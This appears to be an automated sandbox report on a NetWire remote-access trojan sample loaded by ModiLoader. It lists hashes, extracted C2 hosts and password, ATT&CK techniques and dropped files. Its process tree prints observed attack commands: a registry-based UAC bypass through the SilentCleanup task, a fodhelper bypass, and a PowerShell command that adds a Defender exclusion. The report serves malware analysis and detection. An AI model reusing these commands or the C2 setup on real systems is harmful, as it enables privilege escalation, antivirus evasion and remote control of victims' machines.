Analysis

  • max time kernel
    114s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-03-2024 01:13

General

  • Target

    RAT/NetWire.exe

  • Size

    1.2MB

  • MD5

    7621f79a7f66c25ad6c636d5248abeb9

  • SHA1

    98304e41f82c3aee82213a286abdee9abf79bcce

  • SHA256

    086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d

  • SHA512

    59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd

  • SSDEEP

    24576:nBlDgE7EmXWAqSvg439vGSVNe1/hqIiHSvd7:n7DlC+GSjiBiyF

Malware Config

Extracted

Family

modiloader

C2

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Extracted

Family

netwire

C2

tamerimia.ug:6975

vbchjfssdfcxbcver.ru:6975

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    AAAAA

  • lock_executable

    false

  • mutex

    CQbRXVuG

  • offline_keylogger

    false

  • password

    jhbkdcfgvdfgknl

  • registry_autorun

    false

  • use_mutex

    true

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • NetWire RAT payload 2 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • ModiLoader First Stage 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RAT\NetWire.exe
    "C:\Users\Admin\AppData\Local\Temp\RAT\NetWire.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Users\Admin\AppData\Local\Temp\RAT\NetWire.exe
      "C:\Users\Admin\AppData\Local\Temp\RAT\NetWire.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      PID:3156
      • C:\Windows\SysWOW64\Notepad.exe
        C:\Windows\System32\Notepad.exe
        3⤵
          PID:4572
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
            4⤵
              PID:5956
              • C:\Windows\SysWOW64\reg.exe
                reg delete hkcu\Environment /v windir /f
                5⤵
                • Modifies registry key
                PID:1704
              • C:\Windows\SysWOW64\reg.exe
                reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                5⤵
                • Modifies registry key
                PID:5620
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                5⤵
                  PID:5656
                • C:\Windows\SysWOW64\reg.exe
                  reg delete hkcu\Environment /v windir /f
                  5⤵
                  • Modifies registry key
                  PID:4904
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "
                4⤵
                  PID:3160
                  • C:\Windows \System32\fodhelper.exe
                    "C:\Windows \System32\fodhelper.exe"
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1360
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
                      6⤵
                        PID:812
                        • C:\Windows\system32\cmd.exe
                          cmd /c C:\Users\Public\x.vbs
                          7⤵
                          • Checks computer location settings
                          • Modifies registry class
                          PID:4996
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"
                            8⤵
                            • Checks computer location settings
                            PID:4944
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "
                              9⤵
                                PID:5160
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local
                                  10⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5340
                  • C:\Program Files (x86)\internet explorer\ieinstal.exe
                    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                    3⤵
                      PID:5684
                • C:\Windows\system32\AUDIODG.EXE
                  C:\Windows\system32\AUDIODG.EXE 0x494 0x33c
                  1⤵
                    PID:972
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3684 --field-trial-handle=3112,i,1786399861560734457,5606877702857066305,262144 --variations-seed-version /prefetch:8
                    1⤵
                      PID:1016

                    Network

                    MITRE ATT&CK Matrix ATT&CK v13

                    Persistence

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Privilege Escalation

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Defense Evasion

                    Modify Registry

                    2
                    T1112

                    Discovery

                    Query Registry

                    1
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Command and Control

                    Web Service

                    1
                    T1102

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p2k3bs24.mw5.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Public\Natso.bat
                      Filesize

                      283B

                      MD5

                      5cc1682955fd9f5800a8f1530c9a4334

                      SHA1

                      e09b6a4d729f2f4760ee42520ec30c3192c85548

                      SHA256

                      5562cc607d2f698327efacc4a21bd079bb14a99b03e7a01b3c67f8440e341cb3

                      SHA512

                      80767263aad44c739236161d4338d5dd8b0b58613f22cd173c3e88ebf143220ee56bbf93ace69a07d3c2f00daff0adbaa8461a1d53d12699725395c931c43cb6

                    • C:\Users\Public\Runex.bat
                      Filesize

                      226B

                      MD5

                      f6828e22e6abe87c624e4683fac5889b

                      SHA1

                      b93d63354d4ddb226dab90955576a6d2cad05ba0

                      SHA256

                      e1b1884353a51436f90dfed9f85ed9dd98fccfbd13dee7aa54fd901f77fe5e9c

                      SHA512

                      26afb36afcb3f286b85ebd72061e26f84c33075d3d0767cc93f50ec414a85838c86049e0c56ff43011d1a309b98ae355cbe412203429ac243010dc971ac81ec1

                    • C:\Users\Public\cde.bat
                      Filesize

                      295B

                      MD5

                      b442a70fdba934a802a468446c697646

                      SHA1

                      fe28bd0ab4831dc3bd71b774bdfac829b8806a35

                      SHA256

                      c8dbdd9043f83f13287d442bcd98d06376d19a1d82f4e1dd4c9449f9b2ae0c7d

                      SHA512

                      47b6d6396db728ad358c8104632f2be9e305ae674f2b08d501a68cded63c462316cdd18e861d9d411958b1012aaac4620239ca6029db6112285a8e06134d1903

                    • C:\Users\Public\fodhelper.exe
                      Filesize

                      46KB

                      MD5

                      7215c73ec1aae35b9e4b1f22c811f85c

                      SHA1

                      98551f5184691b65dceba531c4e4975d77cd25a5

                      SHA256

                      7e80da8d839dcf05e30317256460ed7a4ee25cab2750d768569aaab35e1e8c64

                      SHA512

                      b68eed48dbd32e485fd56b952e3e642f25f1eefe26ea533b13857e225272ee9668c39552284a438175a323d1685a80d9f878ef0637b5d928bb1e1ed1ac505d61

                    • C:\Users\Public\propsys.dll
                      Filesize

                      108KB

                      MD5

                      487766bf2f0add388cb123d1ef7ece46

                      SHA1

                      766564c04d9e8a6745baa2ad28da5d68ad1d79bf

                      SHA256

                      fa5d5f9bd3a3aece8941e52a00d05db8910d3332f4f276bc03663c7944ae11cb

                      SHA512

                      3b5c285c4eb749c5e34405b38e146e9fc3fe28c535ee12c4e0f075e167768f37b588e50c2dbd43a27b67b11e7483ad51fcd6b6e7638059dd40bc303c664a8a7e

                    • C:\Users\Public\x.bat
                      Filesize

                      36B

                      MD5

                      47b8b6e888806f25ee24e55a6b116262

                      SHA1

                      1fbb022a6c3183f21806c19230a8ad421df9a2ae

                      SHA256

                      61e8f32d99ac46e7eab3e976b0afcadc55ad837d696f0b2a003fe9cd4f34335e

                      SHA512

                      a240e3b7f1a529da2dba304786da101548a039306c63f28c34f60973319ba37564e51493d021cd2c2adae4eecd98e8d6dd80e8b46472a6f6e7d1b069d000317a

                    • C:\Users\Public\x.vbs
                      Filesize

                      260B

                      MD5

                      70f4e3618d69b36ca74f412ac75ec1fa

                      SHA1

                      59fb651c5c976c86f3e02811b0250ca7dc10eb3a

                      SHA256

                      c120ecbb33c2092fe379bcd2edbd702ea0a571ec99c233f8441e70e8ac62efd9

                      SHA512

                      fa4aa79f35d4d5999f5237aaf46314a2de0c88ba8ea3c4a33be50fbeb53d9bb201033965e4aee17be13081a082daaaed3aae5c84181f24e9723b762a453bf191

                    • memory/3156-2-0x00000000001F0000-0x00000000001F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/3156-3-0x00000000006B0000-0x00000000006B1000-memory.dmp
                      Filesize

                      4KB

                    • memory/3156-848-0x0000000010410000-0x000000001047E000-memory.dmp
                      Filesize

                      440KB

                    • memory/3156-1106-0x0000000010410000-0x000000001047E000-memory.dmp
                      Filesize

                      440KB

                    • memory/4572-865-0x0000000000D90000-0x0000000000D91000-memory.dmp
                      Filesize

                      4KB

                    • memory/4572-1172-0x0000000010480000-0x00000000104C4000-memory.dmp
                      Filesize

                      272KB

                    • memory/4572-1107-0x0000000010480000-0x00000000104C4000-memory.dmp
                      Filesize

                      272KB

                    • memory/4572-884-0x0000000002BC0000-0x0000000002BC1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4572-857-0x0000000000D40000-0x0000000000D41000-memory.dmp
                      Filesize

                      4KB

                    • memory/4572-856-0x0000000001000000-0x0000000001001000-memory.dmp
                      Filesize

                      4KB

                    • memory/4572-1179-0x0000000010480000-0x00000000104C4000-memory.dmp
                      Filesize

                      272KB

                    • memory/4716-0-0x00000000023E0000-0x00000000023E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/4716-817-0x00000000023E0000-0x00000000023E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/5340-1160-0x0000024A4D650000-0x0000024A4D672000-memory.dmp
                      Filesize

                      136KB

                    • memory/5340-1170-0x0000024A65870000-0x0000024A65880000-memory.dmp
                      Filesize

                      64KB

                    • memory/5340-1171-0x0000024A65870000-0x0000024A65880000-memory.dmp
                      Filesize

                      64KB

                    • memory/5340-1169-0x00007FFB92280000-0x00007FFB92D41000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/5340-1175-0x00007FFB92280000-0x00007FFB92D41000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/5684-1177-0x0000000000400000-0x0000000000433000-memory.dmp
                      Filesize

                      204KB

                    • memory/5684-1137-0x0000000000400000-0x0000000000433000-memory.dmp
                      Filesize

                      204KB